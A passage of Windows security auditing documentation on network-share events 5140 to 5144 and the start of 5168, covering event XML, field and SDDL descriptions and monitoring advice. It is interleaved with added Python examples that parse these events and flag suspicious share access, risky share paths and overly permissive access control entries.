Directory, Event, Timer, Device, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port

Source Address [Type = UnicodeString]: source IP address from which access was performed.
IPv6 address or ::ffff:IPv4 address of a client.
::1 or 127.0.0.1 means localhost.
Source Port [Type = UnicodeString]: source TCP or UDP port which was used from remote or local
machine to request the access.
0 for local access attempts.
Share Information:
Share Name [Type = UnicodeString]: the name of accessed network share. The format is:
\\*\SHARE_NAME.
Share Path [Type = UnicodeString]: the full system (NTFS) path for accessed share. The format is: \\??\PATH. Can be empty, for example for Share Name: \\*\IPC$.
Access Request Information:
Access Mask [Type = HexInt32]: the sum of hexadecimal values of requested access rights. See “Table 13.
File access codes.” for different hexadecimal values for access rights. Has always “0x1” value for this event.
Accesses [Type = UnicodeString]: the list of access rights which were requested by Subject\Security ID.
These access rights depend on Object Type. Has always “ReadData (or ListDirectory)” value for this
event.

Security Monitoring Recommendations

For 5140(S, F): A network share object was accessed.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have high-value computers for which you need to monitor all access to all shares or specific shares
(“Share Name”), monitor this event. For example, you could monitor share C$ on domain controllers.
Monitor this event if the Network Information\Source Address is not from your internal IP range.
Monitor this event if the Network Information\Source Address should not be able to connect with the
specific computer (Computer:).
If you need to monitor access attempts to local shares from a specific IP address (“Network
Information\Source Address”), use this event.
If you need to monitor for specific Access Types (for example, ReadData or WriteData), for all or specific
shares (“Share Name”), monitor this event for the “Access Type.”
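The monitoring recommendations for 5145 (earlier on this page) and for 5140 above, as an added example that is not Microsoft's code: Python that parses events in the XML layout shown here, expands Access Mask with Table 13, and flags external source addresses, write-type access requests, watchlisted targets and administrative-share access. The internal ranges, the watchlist, the failed-write sample and the C$ sample are constructed; the success/failure test relies on the standard Audit Failure keyword bit (0x8010000000000000) and the ::ffff: handling follows the Source Address description.

```python
import ipaddress
import xml.etree.ElementTree as ET
from typing import Dict, List

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Table 13 "File access codes" from this page: mask bit -> (access name, schema value).
FILE_ACCESS_CODES = {
    0x1: ("ReadData (or ListDirectory)", "%%4416"),
    0x2: ("WriteData (or AddFile)", "%%4417"),
    0x4: ("AppendData (or AddSubdirectory or CreatePipeInstance)", "%%4418"),
    0x8: ("ReadEA", "%%4419"),
    0x10: ("WriteEA", "%%4420"),
    0x20: ("Execute/Traverse", "%%4421"),
    0x40: ("DeleteChild", "%%4422"),
    0x80: ("ReadAttributes", "%%4423"),
    0x100: ("WriteAttributes", "%%4424"),
    0x10000: ("DELETE", "%%1537"),
    0x20000: ("READ_CONTROL", "%%1538"),
    0x40000: ("WRITE_DAC", "%%1539"),
    0x80000: ("WRITE_OWNER", "%%1540"),
    0x100000: ("SYNCHRONIZE", "%%1541"),
    0x1000000: ("ACCESS_SYS_SEC", "%%1542"),
}
# The rights this page recommends monitoring in 5145 (especially for Failure).
WRITE_LIKE = {0x2, 0x4, 0x10, 0x40, 0x100, 0x10000, 0x40000, 0x80000}
AUDIT_FAILURE_KEYWORD = 0x0010000000000000  # set in Keywords on Audit Failure events

# Constructed for this example: the organisation's internal ranges and a watchlist of
# share -> relative target names whose access should always be reviewed.
INTERNAL_RANGES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "192.168.0.0/16", "fe80::/10")]
WATCHLIST = {"\\\\*\\Documents": {"Bginfo.exe"}}


def decode_access_mask(mask: int) -> List[str]:
    """Expand an Access Mask such as 0x100081 into the names from Table 13."""
    names = [name for bit, (name, _) in FILE_ACCESS_CODES.items() if mask & bit]
    unknown = mask & ~sum(FILE_ACCESS_CODES)  # the table's bits are disjoint, so sum == OR
    if unknown:
        names.append(f"unknown(0x{unknown:x})")
    return names


def is_internal(addr: str) -> bool:
    """Source Address is IPv6, ::ffff:IPv4, ::1 / 127.0.0.1 for localhost, or '-' for local access."""
    if addr in ("", "-"):
        return True
    ip = ipaddress.ip_address(addr)
    if ip.is_loopback:
        return True
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped
    return any(ip in net for net in INTERNAL_RANGES)


def parse_event(xml_text: str) -> Dict[str, str]:
    """Flatten the System fields we need plus every EventData/Data element into one dict."""
    root = ET.fromstring(xml_text)
    fields = {"EventID": root.findtext("e:System/e:EventID", namespaces=NS),
              "Keywords": root.findtext("e:System/e:Keywords", default="0", namespaces=NS)}
    for d in root.findall("e:EventData/e:Data", NS):
        fields[d.get("Name")] = d.text or ""
    return fields


def triage(ev: Dict[str, str]) -> List[str]:
    """Apply the Security Monitoring Recommendations for 5145 and 5140 to one event."""
    outcome = "Failure" if int(ev["Keywords"], 16) & AUDIT_FAILURE_KEYWORD else "Success"
    eid, src, share = ev["EventID"], ev.get("IpAddress", "-"), ev.get("ShareName", "")
    user, target = ev.get("SubjectUserName", "?"), ev.get("RelativeTargetName", "")
    findings = []
    if not is_internal(src):
        findings.append(f"{outcome} {eid}: source {src} is outside the internal IP ranges")
    if eid == "5140" and share.endswith("$"):
        findings.append(f"{outcome} 5140: administrative share {share} accessed by {user} from {src}")
    if eid == "5145":
        mask = int(ev.get("AccessMask", "0"), 16)
        wanted = [FILE_ACCESS_CODES[b][0] for b in FILE_ACCESS_CODES if b in WRITE_LIKE and mask & b]
        if wanted:
            findings.append(f"{outcome} 5145: write-type access on {share}\\{target}: {', '.join(wanted)}")
        if target in WATCHLIST.get(share, ()):
            findings.append(f"{outcome} 5145: watchlist hit {share}\\{target} by {user} from {src}")
    return findings


def make_event(event_id: int, keywords: str, data: Dict[str, str]) -> str:
    """Build a minimal event in the XML layout shown on this page (constructed sample)."""
    items = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<Keywords>{keywords}</Keywords></System><EventData>{items}</EventData></Event>')


# Field values from the 5145 sample on this page; the failed write and the 5140 C$ access are constructed.
SAMPLE_5145 = make_event(5145, "0x8020000000000000", {
    "SubjectUserName": "dadmin", "IpAddress": "fe80::31ea:6c3c:f40d:1973", "IpPort": "56926",
    "ShareName": "\\\\*\\Documents", "ShareLocalPath": "\\??\\C:\\Documents",
    "RelativeTargetName": "Bginfo.exe", "AccessMask": "0x100081", "AccessList": "%%1541 %%4416 %%4423"})
SAMPLE_5145_FAIL = make_event(5145, "0x8010000000000000", {
    "SubjectUserName": "dadmin", "IpAddress": "203.0.113.25", "ShareName": "\\\\*\\Documents",
    "RelativeTargetName": "payroll.xlsx", "AccessMask": "0x10002", "AccessList": "%%1537 %%4417"})
SAMPLE_5140 = make_event(5140, "0x8020000000000000", {
    "SubjectUserName": "dadmin", "IpAddress": "::ffff:10.0.0.100", "ShareName": "\\\\*\\C$",
    "AccessMask": "0x1", "AccessList": "%%4416"})
```

`triage(parse_event(SAMPLE_5145))` yields only the watchlist hit (the link-local source is inside the constructed ranges and 0x100081 requests no write-type right), while the failed-write sample produces both an external-source and a write-type finding.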
5142(S): A network share object was added.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit File Share
Event Description:
This event generates every time a network share object is added.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5142</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T02:27:01.206646900Z" />
<EventRecordID>268462</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="4304" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x38d12</Data>
<Data Name="ShareName">\\\\\*\\Documents</Data>
<Data Name="ShareLocalPath">C:\\Documents</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008 R2, Windows 7.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “add network share object” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “add network share
object” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Share Information:
Share Name [Type = UnicodeString]: the name of the added share object. The format is:
\\*\SHARE_NAME.
Share Path [Type = UnicodeString]: the full system (NTFS) path for the added share object. The format is: \\??\PATH.

Security Monitoring Recommendations

For 5142(S): A network share object was added.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have high-value computers for which you need to monitor creation of new file shares, monitor this
event. For example, you could monitor domain controllers.
We recommend checking “Share Path”, because it should not point to system directories, such as
C:\Windows or C:\, or to critical local folders which contain private or high value information.
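The Share Path check recommended above, as an added example that is not Microsoft's code: it strips the \??\ prefix that the Share Path field may carry, normalises the path so that "." and ".." components cannot sidestep a prefix test, and flags whole-drive shares, the C:\Windows system directory, and a constructed list of critical local folders.

```python
import ntpath
from typing import Optional

# From this page's recommendation: a share must not expose a system directory or a whole drive.
SYSTEM_DIRECTORIES = ("C:\\Windows",)
# Constructed for this example: local folders that hold private or high-value information.
CRITICAL_FOLDERS = ("C:\\Finance", "D:\\HR")


def normalize_share_path(share_local_path: str) -> str:
    """5142 may report Share Path in NT object form (\\??\\C:\\Documents); strip that prefix
    and collapse '.' and '..' components so that a prefix check cannot be sidestepped."""
    path = share_local_path[4:] if share_local_path.startswith("\\??\\") else share_local_path
    return ntpath.normpath(path)


def _is_under(path: str, folder: str) -> bool:
    """Case-insensitive 'path equals folder or lies below it' test on Windows paths."""
    p, f = ntpath.normcase(path), ntpath.normcase(folder).rstrip("\\")
    return p == f or p.startswith(f + "\\")


def check_share_path(share_local_path: str) -> Optional[str]:
    """Return a finding when the new share's path violates the recommendation, else None."""
    path = normalize_share_path(share_local_path)
    drive, tail = ntpath.splitdrive(path)
    if drive and tail in ("", "\\"):  # e.g. \??\C:\ shares the whole C: drive
        return f"share exposes a whole drive: {path}"
    for folder in SYSTEM_DIRECTORIES:
        if _is_under(path, folder):
            return f"share points into a system directory: {path}"
    for folder in CRITICAL_FOLDERS:
        if _is_under(path, folder):
            return f"share points at a critical local folder: {path}"
    return None
```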
5143(S): A network share object was modified.
4/5/2019 • 6 minutes to read

Applies to
Windows 10
Windows Server 2016

Subcategory: Audit File Share
Event Description:
This event generates every time a network share object is modified.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5143</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T02:42:56.743298600Z" />
<EventRecordID>268483</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="524" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x38d12</Data>
<Data Name="ObjectType">Directory</Data>
<Data Name="ShareName">\\\\\*\\Documents</Data>
<Data Name="ShareLocalPath">C:\\Documents</Data>
<Data Name="OldRemark">N/A</Data>
<Data Name="NewRemark">N/A</Data>
<Data Name="OldMaxUsers">0xffffffff</Data>
<Data Name="NewMaxUsers">0xffffffff</Data>
<Data Name="OldShareFlags">0x800</Data>
<Data Name="NewShareFlags">0x800</Data>
<Data Name="OldSD">O:S-1-5-21-3457937927-2839227994-823803824-1104G:DAD:(A;OICI;FA;;;BA)(A;OICI;FA;;;WD)</Data>
<Data Name="NewSD">O:BAG:DAD:(D;;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICI;FA;;;WD)(A;OICI;FA;;;BA)</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008 R2, Windows 7.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested the “modify network share object” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “modify network share
object” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Share Information:
Object Type [Type = UnicodeString]: The type of an object that was modified. Always “Directory” for this
event.
The most common Object Types are:

Directory, Event, Timer, Device, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject, FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process, Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port, FilterConnectionPort, ALPC Port

Share Name [Type = UnicodeString]: the name of the modified share object. The format is: \\*\SHARE_NAME.
Share Path [Type = UnicodeString]: the full system (NTFS) path for the modified share object. The format is: \\??\PATH. Can be empty, for example for Share Name: \\*\IPC$.
Old Remark [Type = UnicodeString]: the old value of the network share “Comments:” field. Has “N/A” value if it is not set.
New Remark [Type = UnicodeString]: the new value of the network share “Comments:” field. Has “N/A” value if it is not set.
Old MaxUsers [Type = HexInt32]: old hexadecimal value of the “Limit the number of simultaneous users to:” field. Has “0xFFFFFFFF” value if the number of connections is unlimited.
New MaxUsers [Type = HexInt32]: new hexadecimal value of the “Limit the number of simultaneous users to:” field. Has “0xFFFFFFFF” value if the number of connections is unlimited.
Old ShareFlags [Type = HexInt32]: old hexadecimal value of the “Offline Settings” caching settings window flags.
New ShareFlags [Type = HexInt32]: new hexadecimal value of the “Offline Settings” caching settings window flags.
Old SD [Type = UnicodeString]: the old Security Descriptor Definition Language (SDDL) value for the network share security descriptor.
New SD [Type = UnicodeString]: the new Security Descriptor Definition Language (SDDL) value for the network share security descriptor.

Note The Security Descriptor Definition Language (SDDL) defines string elements for enumerating information contained in the security descriptor.
Example:
O:BAG:SYD:(D;;0xf0007;;;AN)(D;;0xf0007;;;BG)(A;;0xf0007;;;SY)(A;;0x7;;;BA)S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)
O: = Owner. SID of specific security principal, or reserved (pre-defined) value, for example: BA (BUILTIN_ADMINISTRATORS), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the list of possible values in the table below:

VALUE DESCRIPTION
"AO" Account operators
"RU" Alias to allow previous Windows 2000
"AN" Anonymous logon
"AU" Authenticated users
"BA" Built-in administrators
"BG" Built-in guests
"BO" Backup operators
"BU" Built-in users
"CA" Certificate server administrators
"CG" Creator group
"CO" Creator owner
"DA" Domain administrators
"DC" Domain computers
"DD" Domain controllers
"DG" Domain guests
"DU" Domain users
"EA" Enterprise administrators
"ED" Enterprise domain controllers
"WD" Everyone
"PA" Group Policy administrators
"IU" Interactively logged-on user
"LA" Local administrator
"LG" Local guest
"LS" Local service account
"SY" Local system
"NU" Network logon user
"NO" Network configuration operators
"NS" Network service account
"PO" Printer operators
"PS" Personal self
"PU" Power users
"RS" RAS servers group
"RD" Terminal server users
"RE" Replicator
"RC" Restricted code
"SA" Schema administrators
"SO" Server operators
"SU" Service logon user

G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
DACL/SACL entry format:
entry_type:inheritance_flags(ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
Example: D:(A;;FA;;;WD)
entry_type:
"D" - DACL
"S" - SACL
inheritance_flags:
"P" - SDDL_PROTECTED, inheritance from containers that are higher in the folder hierarchy is blocked.
"AI" - SDDL_AUTO_INHERITED, inheritance is allowed, assuming that "P" is not also set.
"AR" - SDDL_AUTO_INHERIT_REQ, child objects inherit permissions from this object.
ace_type:
"A" - ACCESS ALLOWED
"D" - ACCESS DENIED
"OA" - OBJECT ACCESS ALLOWED: only applies to a subset of the object(s).
"OD" - OBJECT ACCESS DENIED: only applies to a subset of the object(s).
"AU" - SYSTEM AUDIT
"AL" - SYSTEM ALARM
"OU" - OBJECT SYSTEM AUDIT
"OL" - OBJECT SYSTEM ALARM
ace_flags:
"CI" - CONTAINER INHERIT: child objects that are containers, such as directories, inherit the ACE as an explicit ACE.
"OI" - OBJECT INHERIT: child objects that are not containers inherit the ACE as an explicit ACE.
"NP" - NO PROPAGATE: only immediate children inherit this ACE.
"IO" - INHERITANCE ONLY: the ACE doesn’t apply to this object, but may affect children via inheritance.
"ID" - ACE IS INHERITED
"SA" - SUCCESSFUL ACCESS AUDIT
"FA" - FAILED ACCESS AUDIT
rights: a hexadecimal string which denotes the access mask, or a reserved value, for example: FA (File All Access), FX (File Execute), FW (File Write), etc.

VALUE  DESCRIPTION
Generic access rights
"GA"   GENERIC ALL
"GR"   GENERIC READ
"GW"   GENERIC WRITE
"GX"   GENERIC EXECUTE
File access rights
"FA"   FILE ALL ACCESS
"FR"   FILE GENERIC READ
"FW"   FILE GENERIC WRITE
"FX"   FILE GENERIC EXECUTE
Registry key access rights
"KA"   KEY ALL ACCESS
"KR"   KEY READ
"KW"   KEY WRITE
"KX"   KEY EXECUTE
Directory service access rights
"RC"   Read Permissions
"SD"   Delete
"WD"   Modify Permissions
"WO"   Modify Owner
"RP"   Read All Properties
"WP"   Write All Properties
"CC"   Create All Child Objects
"DC"   Delete All Child Objects
"LC"   List Contents
"SW"   All Validated Writes
"LO"   List Object
"DT"   Delete Subtree
"CR"   All Extended Rights

object_guid: N/A
inherit_object_guid: N/A
account_sid: SID of a specific security principal, or a reserved value, for example: AN (Anonymous), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the table above for more details.
For more information about SDDL syntax, see these articles: https://msdn.microsoft.com/library/cc230374.aspx,
https://msdn.microsoft.com/library/windows/hardware/aa374892(v=vs.85).aspx.
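As an added example (not code from the original article), this Python parser splits an SDDL string of the form described above into its owner, group, DACL and SACL parts, decodes the six fields of each ACE with the alias tables on this page, and applies a triage filter that flags allow ACEs granting a broad principal write-class rights, which is what a reviewer of a 5143 "New SD" value wants to know first. The alias dictionaries are subsets of the tables above, the write-class selection is ours, and the GENERIC_WRITE/GENERIC_ALL bit values are standard Windows constants not listed on this page.

```python
import re

# Alias tables, as subsets of the SDDL tables on this page.
SID_ALIASES = {"AN": "Anonymous logon", "AU": "Authenticated users", "BA": "Built-in administrators",
               "BG": "Built-in guests", "BU": "Built-in users", "DA": "Domain administrators",
               "DU": "Domain users", "EA": "Enterprise administrators", "SY": "Local system",
               "WD": "Everyone", "LS": "Local service account", "NS": "Network service account"}
ACE_TYPES = {"A": "ACCESS ALLOWED", "D": "ACCESS DENIED", "OA": "OBJECT ACCESS ALLOWED",
             "OD": "OBJECT ACCESS DENIED", "AU": "SYSTEM AUDIT", "AL": "SYSTEM ALARM",
             "OU": "OBJECT SYSTEM AUDIT", "OL": "OBJECT SYSTEM ALARM"}
RIGHTS_ALIASES = {"GA": "GENERIC ALL", "GR": "GENERIC READ", "GW": "GENERIC WRITE",
                  "GX": "GENERIC EXECUTE", "FA": "FILE ALL ACCESS", "FR": "FILE GENERIC READ",
                  "FW": "FILE GENERIC WRITE", "FX": "FILE GENERIC EXECUTE", "KA": "KEY ALL ACCESS",
                  "KR": "KEY READ", "KW": "KEY WRITE", "KX": "KEY EXECUTE", "RC": "Read Permissions",
                  "SD": "Delete", "WD": "Modify Permissions", "WO": "Modify Owner",
                  "RP": "Read All Properties", "WP": "Write All Properties",
                  "CC": "Create All Child Objects", "DC": "Delete All Child Objects",
                  "LC": "List Contents", "SW": "All Validated Writes", "LO": "List Object",
                  "DT": "Delete Subtree", "CR": "All Extended Rights"}
# Rights that let a principal change data, ownership or permissions (our selection).
WRITE_ALIASES = {"GA", "GW", "FA", "FW", "KA", "KW", "WD", "WO", "SD", "WP", "CC", "DC", "DT"}
# Mask bits WriteData, AppendData, DeleteChild, DELETE, WRITE_DAC, WRITE_OWNER (4656 table on
# this page) plus GENERIC_WRITE and GENERIC_ALL (standard Windows values, not on this page).
WRITE_MASK = 0x2 | 0x4 | 0x40 | 0x10000 | 0x40000 | 0x80000 | 0x40000000 | 0x10000000
ACE_RE = re.compile(r"\(([^)]*)\)")   # one ACE per parenthesised group

# The page's example (whitespace artifacts removed) and a constructed permissive descriptor.
PAGE_SDDL = ("O:BAG:SYD:(D;;0xf0007;;;AN)(D;;0xf0007;;;BG)(A;;0xf0007;;;SY)(A;;0x7;;;BA)"
             "S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)")
PERMISSIVE_SDDL = "O:BAG:SYD:(A;OICI;FA;;;WD)"


def _split_sections(sddl):
    """Split into O:, G:, D: and S: components. A marker is only recognised outside
    parentheses, so nothing inside an ACE can be mistaken for one."""
    sections, key, buf, depth, i = {}, None, [], 0, 0
    while i < len(sddl):
        ch = sddl[i]
        if depth == 0 and ch in "OGDS" and sddl[i + 1:i + 2] == ":":
            if key is not None:
                sections[key] = "".join(buf)
            key, buf, i = ch, [], i + 2
            continue
        depth += (ch == "(") - (ch == ")")
        buf.append(ch)
        i += 1
    if key is not None:
        sections[key] = "".join(buf)
    return sections


def _split_codes(text):
    """'ARAI' -> ['AR', 'AI']; 'P' (SDDL_PROTECTED) is the only one-letter code."""
    out, i = [], 0
    while i < len(text):
        width = 1 if text[i] == "P" else 2
        out.append(text[i:i + width])
        i += width
    return out


def parse_ace(text):
    """Decode the six ';'-separated ACE fields described above."""
    fields = text.split(";")
    if len(fields) != 6:
        raise ValueError("ACE needs 6 fields: " + text)
    ace_type, flags, rights, obj_guid, inh_guid, sid = fields
    is_hex = rights.lower().startswith("0x")
    return {"type": ace_type, "type_name": ACE_TYPES.get(ace_type, "?"),
            "flags": _split_codes(flags),
            "rights_mask": int(rights, 16) if is_hex else None,
            "rights": [] if is_hex else _split_codes(rights),
            "object_guid": obj_guid or None, "inherit_object_guid": inh_guid or None,
            "sid": sid, "sid_name": SID_ALIASES.get(sid, sid)}


def _parse_acl(section):
    head = section.split("(", 1)[0]            # inheritance flags precede the first ACE
    return {"flags": _split_codes(head), "aces": [parse_ace(a) for a in ACE_RE.findall(section)]}


def parse_sddl(sddl):
    s = _split_sections(sddl)
    return {"owner": s.get("O"), "group": s.get("G"),
            "dacl": _parse_acl(s["D"]) if "D" in s else None,
            "sacl": _parse_acl(s["S"]) if "S" in s else None}


def overly_permissive_aces(parsed, broad=("WD", "AN", "AU", "BG")):
    """Allow ACEs granting a broad principal write-class rights. Earlier deny ACEs are
    not modelled, so this is a triage filter for 5143 New SD values, not an access check."""
    hits = []
    for ace in (parsed["dacl"] or {"aces": []})["aces"]:
        if ace["type"] != "A" or ace["sid"] not in broad:
            continue
        if ace["rights_mask"] is not None:
            writable = bool(ace["rights_mask"] & WRITE_MASK)
        else:
            writable = bool(set(ace["rights"]) & WRITE_ALIASES)
        if writable:
            hits.append(ace)
    return hits
```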

Security Monitoring Recommendations


For 5143(S): A network share object was modified.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have high-value computers for which you need to monitor all modifications to all shares or specific
shares (“Share Name”), monitor this event. For example, you could monitor all changes to the SYSVOL share
on domain controllers.
5144(S): A network share object was deleted.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit File Share
Event Description:
This event generates every time a network share object is deleted.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:

- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5144</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T02:17:14.820551800Z" />
<EventRecordID>268368</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="4656" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x38d12</Data>
<Data Name="ShareName">\\\\\*\\Documents</Data>
<Data Name="ShareLocalPath">C:\\Documents</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008 R2, Windows 7.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “delete network share object” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security
principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain
controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user
from the database and places it in the access token for that user. The system uses the SID in the access token to
identify the user in all subsequent interactions with Windows security. When a SID has been used as the
unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more
information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “delete network share
object” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Share Information:
Share Name [Type = UnicodeString]: the name of the deleted share object. The format is:
\\*\SHARE_NAME
Share Path [Type = UnicodeString]: the full system (NTFS) path for the deleted share object. The format is:
\\??\PATH.

Security Monitoring Recommendations


For 5144(S): A network share object was deleted.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have critical network shares for which you need to monitor all changes (especially, the deletion of that
share), monitor for specific “Share Information\Share Name”.
If you have high-value computers for which you need to monitor all changes (especially, deletion of file
shares), monitor for all 5144 events on these computers. For example, you could monitor file shares on
domain controllers.
5168(F): SPN check for SMB/SMB2 failed.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit File Share
Event Description:
This event generates when the SMB SPN check fails.
It often happens because the client uses the NTLMv1 or LM protocol while the “Microsoft Network Server: Server SPN target name validation level” group policy is set to “Require from client” on the server side. The SPN is only sent to the server when the NTLMv2 or Kerberos protocols are used, and only then can the SPN be validated.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5168</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12808</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T17:53:40.294859800Z" />
<EventRecordID>268946</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="80" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0xd0cd4</Data>
